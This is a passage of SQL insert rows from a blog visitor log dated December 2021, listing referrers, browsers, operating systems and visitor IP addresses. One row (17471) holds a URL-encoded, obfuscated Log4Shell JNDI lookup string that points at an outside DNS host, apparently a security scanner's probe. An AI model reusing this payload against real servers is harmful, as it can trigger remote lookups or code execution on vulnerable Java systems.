(17412,'2021-12-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.160.117.160','000',0,1,0),
(17413,'2021-12-14','http://design-arena.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','188.130.128.200','000',0,7,0),
(17414,'2021-12-14','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.248.23.217','000',0,2,0),
(17415,'2021-12-14','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.132.51','000',0,5,0),
(17416,'2021-12-14','design-arena.ir','Opera','Windows','10.0',NULL,NULL,'','171.25.193.20','000',0,2,0),
(17417,'2021-12-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(17418,'2021-12-14','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17419,'2021-12-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.129.64.135','000',0,1,0),
(17420,'2021-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(17421,'2021-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(17422,'2021-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17423,'2021-12-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17424,'2021-12-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(17425,'2021-12-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(17426,'2021-12-14','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.24','000',0,8,0),
(17427,'2021-12-15','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','37.120.144.83','000',0,5,0),
(17428,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.65.48.154','000',0,2,0),
(17429,'2021-12-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17430,'2021-12-15','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.200.7.187','000',0,1,0),
(17431,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.100.173.29','000',0,7,0),
(17432,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.207.213.249','000',0,2,0),
(17433,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.4.206','000',0,6,0),
(17434,'2021-12-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','148.66.146.12','000',0,1,0),
(17435,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.99.79','000',0,2,0),
(17436,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(17437,'2021-12-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17438,'2021-12-15','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.127','000',0,1,0),
(17439,'2021-12-15','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.85','000',0,5,0),
(17440,'2021-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(17441,'2021-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17442,'2021-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17443,'2021-12-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(17444,'2021-12-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17445,'2021-12-15','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17446,'2021-12-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.137.129','000',0,2,0),
(17447,'2021-12-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.162','000',0,2,0),
(17448,'2021-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.95.203.122','000',0,2,0),
(17449,'2021-12-16','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.80.99.232','000',0,2,0),
(17450,'2021-12-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(17451,'2021-12-16','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','195.181.55.228','000',0,1,0),
(17452,'2021-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.116','000',0,1,0),
(17453,'2021-12-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(17454,'2021-12-16','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,1,0),
(17455,'2021-12-16','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(17456,'2021-12-16','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.150','000',0,1,0),
(17457,'2021-12-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,8,0),
(17458,'2021-12-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.3.1.131','000',0,1,0),
(17459,'2021-12-16','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.252.223.51','000',0,5,0),
(17460,'2021-12-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.118.4.154','000',0,4,0),
(17461,'2021-12-16','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.222','000',0,1,0),
(17462,'2021-12-16','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.206','000',0,1,0),
(17463,'2021-12-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(17464,'2021-12-16','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17465,'2021-12-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,2,0),
(17466,'2021-12-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(17467,'2021-12-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17468,'2021-12-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17469,'2021-12-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.150.8.226','000',0,1,0),
(17470,'2021-12-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(17471,'2021-12-17','http://82.102.9.14:80/blog?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F45.83.64.1%2Fsecurityscan-r3lbrdvmhpgjb6iz%7D','Unknown','Unknown','Unknown',NULL,NULL,'','45.83.67.28','000',0,1,0),
(17472,'2021-12-17','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','121.89.208.237','000',0,2,0),
(17473,'2021-12-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','104.244.72.115','000',0,1,0),
(17474,'2021-12-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(17475,'2021-12-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17476,'2021-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,2,0),
(17477,'2021-12-17','http://ictbank.ir/blog','Safari','iOS','14.8',NULL,NULL,'','89.199.181.213','000',0,2,0),
(17478,'2021-12-17','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,2,0),
(17479,'2021-12-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.199','000',0,1,0),
(17480,'2021-12-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','175.184.167.172','000',0,1,0),
(17481,'2021-12-17','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','195.181.52.58','000',0,1,0),
(17482,'2021-12-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.225.129','000',0,1,0),
(17483,'2021-12-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17484,'2021-12-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(17485,'2021-12-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(17486,'2021-12-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','177.65.214.67','000',0,1,0),
(17487,'2021-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.48.167','000',0,2,0),
(17488,'2021-12-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.186','000',0,1,0),
(17489,'2021-12-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.177.87','000',0,1,0),
(17490,'2021-12-17','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.221.159.51','000',0,1,0),
(17491,'2021-12-17','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,1,0),
(17492,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.89.174.145','000',0,2,0),
(17493,'2021-12-18','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','159.242.234.17','000',0,1,0),
(17494,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(17495,'2021-12-18','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','103.237.101.15','000',0,2,0),
(17496,'2021-12-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,16,0),
(17497,'2021-12-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.90','000',0,2,0),
(17498,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.35.226.254','000',0,2,0),
(17499,'2021-12-18','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17500,'2021-12-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17501,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17502,'2021-12-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','143.198.233.135','000',0,2,0),
(17503,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.247.14','000',0,2,0),
(17504,'2021-12-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.58.142.8','000',0,1,0),
(17505,'2021-12-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.109.211','000',0,1,0),
(17506,'2021-12-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17507,'2021-12-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','157.167.100.180','000',0,1,0),
(17508,'2021-12-18','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,2,0),
(17509,'2021-12-18','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','37.1.63.16','000',0,1,0),
(17510,'2021-12-18','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','198.204.238.212','000',0,3,0),
(17511,'2021-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(17512,'2021-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(17513,'2021-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17514,'2021-12-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(17515,'2021-12-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(17516,'2021-12-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(17517,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.27.146.60','000',0,2,0),
(17518,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17519,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.169.158.146','000',0,1,0),
(17520,'2021-12-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','188.135.115.243','000',0,1,0),
(17521,'2021-12-19','http://82.102.9.14:80/blog','Safari','OS X','10.14.6',NULL,NULL,'','52.83.198.249','000',0,4,0),
(17522,'2021-12-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','112.66.111.254','000',0,1,0),
(17523,'2021-12-19','http://design-arena.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.166.187.145','000',0,2,0),
(17524,'2021-12-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','62.102.130.170','000',0,1,0),
(17525,'2021-12-19','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.122','000',0,1,0),
(17526,'2021-12-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','5.125.225.38','000',0,1,0),
(17527,'2021-12-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(17528,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.203.19','000',0,2,0),
(17529,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','112.117.17.226','000',0,1,0),
(17530,'2021-12-19','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','89.248.166.27','000',0,1,0),
(17531,'2021-12-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(17532,'2021-12-19','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.136','000',0,2,0),
(17533,'2021-12-19','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(17534,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.115.247','000',0,1,0),
(17535,'2021-12-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.116','000',0,2,0),
(17536,'2021-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(17537,'2021-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17538,'2021-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17539,'2021-12-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(17540,'2021-12-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(17541,'2021-12-19','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','176.106.247.22','000',0,6,0),
(17542,'2021-12-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,2,0),
(17543,'2021-12-20','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.121','000',0,1,0),
(17544,'2021-12-20','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.120','000',0,1,0),
(17545,'2021-12-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.63','000',0,1,0),
(17546,'2021-12-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(17547,'2021-12-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.134.248.192','000',0,1,0),
(17548,'2021-12-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(17549,'2021-12-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','205.185.116.89','000',0,1,0),
(17550,'2021-12-20','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.49','000',0,1,0),
(17551,'2021-12-20','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.222','000',0,1,0),
(17552,'2021-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.242.98.207','000',0,1,0),
(17553,'2021-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.68.253','000',0,2,0),
(17554,'2021-12-20','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.1',NULL,NULL,'','176.106.246.67','000',0,2,0),
(17555,'2021-12-20','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.48.249','000',0,2,0),
(17556,'2021-12-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17557,'2021-12-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','62.210.26.145','000',0,2,0),
(17558,'2021-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.53.245.143','000',0,1,0),
(17559,'2021-12-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.185.251','000',0,1,0),
(17560,'2021-12-20','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,2,0),
(17561,'2021-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(17562,'2021-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(17563,'2021-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(17564,'2021-12-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17565,'2021-12-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(17566,'2021-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,4,0),
(17567,'2021-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(17568,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.88.55.38','000',0,1,0),
(17569,'2021-12-21','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.167.236','000',0,1,0),
(17570,'2021-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.12','000',0,2,0),
(17571,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.105.36.146','000',0,4,0),
(17572,'2021-12-21','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','89.45.62.125','000',0,3,0),
(17573,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.169.136.222','000',0,2,0),
(17574,'2021-12-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17575,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.161.17.135','000',0,2,0),
(17576,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.127.215','000',0,2,0),
(17577,'2021-12-21','https://www.google.com/','Safari','OS X','10.15.7',NULL,NULL,'','104.28.62.24','000',0,1,0),
(17578,'2021-12-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','49.205.254.80','000',0,1,0),
(17579,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.253.131.118','000',0,1,0),
(17580,'2021-12-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','111.93.74.54','000',0,1,0),
(17581,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.234.143.14','000',0,1,0),
(17582,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.186.161','000',0,1,0),
(17583,'2021-12-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','193.142.146.230','000',0,2,0),
(17584,'2021-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,2,0),
(17585,'2021-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17586,'2021-12-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17587,'2021-12-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.253.114','000',0,1,0),
(17588,'2021-12-21','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','88.8.93.209','000',0,1,0),
(17589,'2021-12-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.124.227.127','000',0,2,0),
(17590,'2021-12-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','49.113.97.157','000',0,1,0),
(17591,'2021-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(17592,'2021-12-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.114','000',0,2,0),
(17593,'2021-12-22','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','167.114.211.151','000',0,39,0),
(17594,'2021-12-22','http://design-arena.ir','Unknown','iOS','9.3.5',NULL,NULL,'','192.42.116.23','000',0,2,0),
(17595,'2021-12-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,4,0),
(17596,'2021-12-22','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.125.128','000',0,21,0),
(17597,'2021-12-22','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.127.60','000',0,2,0),
(17598,'2021-12-22','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.171','000',0,1,0),
(17599,'2021-12-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17600,'2021-12-22','http://design-arena.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','37.9.175.131','000',0,2,0),
(17601,'2021-12-22','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','191.96.9.144','000',0,5,0),
(17602,'2021-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.136.223','000',0,2,0),
(17603,'2021-12-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,2,0),
(17604,'2021-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.157.9','000',0,1,0),
(17605,'2021-12-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.177.33.16','000',0,2,0),
(17606,'2021-12-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(17607,'2021-12-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17608,'2021-12-22','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','159.242.234.229','000',0,1,0),
(17609,'2021-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(17610,'2021-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(17611,'2021-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(17612,'2021-12-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17613,'2021-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(17614,'2021-12-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.186.142.66','000',0,2,0),
(17615,'2021-12-22','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','89.56.169.117','000',0,2,0),
(17616,'2021-12-23','https://l.instagram.com/','Instagram','Android','10',NULL,NULL,'','72.143.227.221','000',0,6,0),
(17617,'2021-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.216.1','000',0,1,0),
(17618,'2021-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','5.183.209.136','000',0,1,0),
(17619,'2021-12-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.181.165','000',0,2,0),
(17620,'2021-12-23','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','172.27.240.8','000',0,1,0),
(17621,'2021-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17622,'2021-12-23','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','151.234.12.226','000',0,1,0),
(17623,'2021-12-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.149','000',0,6,0),
(17624,'2021-12-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','24.237.104.101','000',0,1,0),
(17625,'2021-12-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(17626,'2021-12-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','134.119.234.209','000',0,1,0),
(17627,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.26.10','000',0,2,0),
(17628,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.143','000',0,2,0),
(17629,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.38.216','000',0,2,0),
(17630,'2021-12-23','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','185.132.132.216','000',0,1,0),
(17631,'2021-12-23','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','66.249.81.45','000',0,1,0),
(17632,'2021-12-23','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','91.99.83.45','000',0,1,0),
(17633,'2021-12-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.255.48.134','000',0,1,0),
(17634,'2021-12-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.189.89','000',0,2,0),
(17635,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.128.231.11','000',0,2,0),
(17636,'2021-12-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.9.9','000',0,1,0),
